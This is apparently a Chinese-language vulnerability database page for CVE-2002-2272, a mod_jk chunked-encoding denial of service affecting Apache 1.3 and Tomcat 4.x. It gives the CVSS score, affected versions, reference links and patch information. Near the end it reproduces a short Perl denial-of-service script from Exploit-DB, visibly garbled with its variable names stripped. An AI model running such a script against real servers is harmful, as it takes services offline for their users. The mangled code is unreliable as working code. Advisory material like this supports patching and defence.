CVE-2002-2272
CVSS7.8
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:47
NMCOE    

[原文]Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.


[CNNVD]Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞(CNNVD-200212-149)

        
        Apache Webserver和Tomcat是由Apache项目组开发和维护的HTTP服务程序,可运行在Unix,Linux和Windows操作系统下。
        mod_jk模块设计存在问题,远程攻击者可以利用这个漏洞发送畸形请求而使Apache Web服务程序在Apache和Tomcat之间不能同步,导致拒绝服务攻击。
        Mod_jk是一款Apache模块,允许Apache透明地提交WEB请求给Tomcat引擎,支持多种协议。当这些组件组合在一起时,由mod_jk实现的通信协议存在漏洞允许恶意用户Apache-Tomcat之间通信不同步。攻击者可以连接目标机器,提交几个包含非法分块编码数据的畸形WEB请求,由于Mod_jk不正确解析分块请求,重复的请求可以导致服务程序停止对正常服务的应答。
        

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:apache:tomcat:4.0.6Apache Software Foundation Tomcat 4.0.6
cpe:/a:apache:http_server:1.3.16Apache Software Foundation Apache 1.3.16
cpe:/a:apache:http_server:1.3.10Apache Software Foundation Apache 1.3.10
cpe:/a:apache:tomcat:4.1.10Apache Software Foundation Tomcat 4.1.10
cpe:/a:apache:http_server:1.3.15Apache Software Foundation Apache 1.3.15
cpe:/a:apache:tomcat:4.0.5Apache Software Foundation Tomcat 4.0.5
cpe:/a:apache:http_server:1.3.11Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:1.3.19Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.2Apache Software Foundation Apache HTTP Server 1.3.2
cpe:/a:apache:http_server:1.3.24Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:tomcat:4.0.4Apache Software Foundation Tomcat 4.0.4
cpe:/a:apache:tomcat:4.0.3Apache Software Foundation Tomcat 4.0.3
cpe:/a:apache:http_server:1.3.13Apache Software Foundation Apache 1.3.13
cpe:/a:apache:http_server:1.3.0Apache Software Foundation Apache HTTP Server 1.3.0
cpe:/a:apache:http_server:1.3.12Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:apache:tomcat:4.1.12Apache Software Foundation Tomcat 4.1.12
cpe:/a:apache:http_server:1.3.26Apache Software Foundation Apache HTTP Server 1.3.26
cpe:/a:apache:http_server:1.3.27Apache Software Foundation Apache HTTP Server 1.3.27
cpe:/a:apache:tomcat:4.1.2Apache Software Foundation Tomcat 4.1.2
cpe:/a:apache:tomcat:4.1.1Apache Software Foundation Tomcat 4.1.1
cpe:/a:apache:tomcat:4.1.3Apache Software Foundation Tomcat 4.1.3
cpe:/a:apache:http_server:1.3.14Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:apache:tomcat:4.1.0Apache Software Foundation Tomcat 4.1.0
cpe:/a:apache:http_server:1.3.1Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/a:apache:http_server:1.3.18Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.17Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.22Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.20Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.25Apache Software Foundation Apache HTTP Server 1.3.25
cpe:/a:apache:tomcat:4.0.1Apache Software Foundation Tomcat 4.0.1
cpe:/a:apache:tomcat:4.0.2Apache Software Foundation Tomcat 4.0.2
cpe:/a:apache:tomcat:4.0.0Apache Software Foundation Tomcat 4.0.0
cpe:/a:apache:tomcat:4.1.9:betaApache Software Foundation Tomcat 4.1.9 beta
cpe:/a:apache:tomcat:4.1.3:betaApache Software Foundation Tomcat 4.1.3 beta
cpe:/a:apache:http_server:1.3.23Apache Software Foundation Apache HTTP Server 1.3.23

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2272
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2272
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-149
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6320
(PATCH)  BID  6320
http://archives.neohapsis.com/archives/bugtraq/2002-12/0045.html
(PATCH)  BUGTRAQ  20021204 Apache/Tomcat Denial Of Service And Information Leakage Vulnerability
http://xforce.iss.net/xforce/xfdb/10771
(UNKNOWN)  XF  tomcat-modjk-get-bo(10771)

- 漏洞信息

Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞
高危 其他
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        Apache Webserver和Tomcat是由Apache项目组开发和维护的HTTP服务程序,可运行在Unix,Linux和Windows操作系统下。
        mod_jk模块设计存在问题,远程攻击者可以利用这个漏洞发送畸形请求而使Apache Web服务程序在Apache和Tomcat之间不能同步,导致拒绝服务攻击。
        Mod_jk是一款Apache模块,允许Apache透明地提交WEB请求给Tomcat引擎,支持多种协议。当这些组件组合在一起时,由mod_jk实现的通信协议存在漏洞允许恶意用户Apache-Tomcat之间通信不同步。攻击者可以连接目标机器,提交几个包含非法分块编码数据的畸形WEB请求,由于Mod_jk不正确解析分块请求,重复的请求可以导致服务程序停止对正常服务的应答。
        

- 公告与补丁

        厂商补丁:
        Apache Software Foundation
        --------------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://jakarta.apache.org/tomcat/index.html

- 漏洞信息 (22068)

Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial Of Service Vulnerability (EDBID:22068)
unix dos
2002-12-04 Verified
0 Sapient2003
N/A [点击下载]
source: http://www.securityfocus.com/bid/6320/info

Apache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.

It has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.

#!/usr/bin/perl -w

use IO::Socket;

 = "Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "\n By Sapient2003\n";
  die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";

 = "GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";

 = IO::Socket::INET->new(
        PeerAddr => [0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host [0]\n";
print  ;
print "Attempted to exploit [0]\n";
close();		

- 漏洞信息

7394
Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
Remote / Network Access Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2002-12-04 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站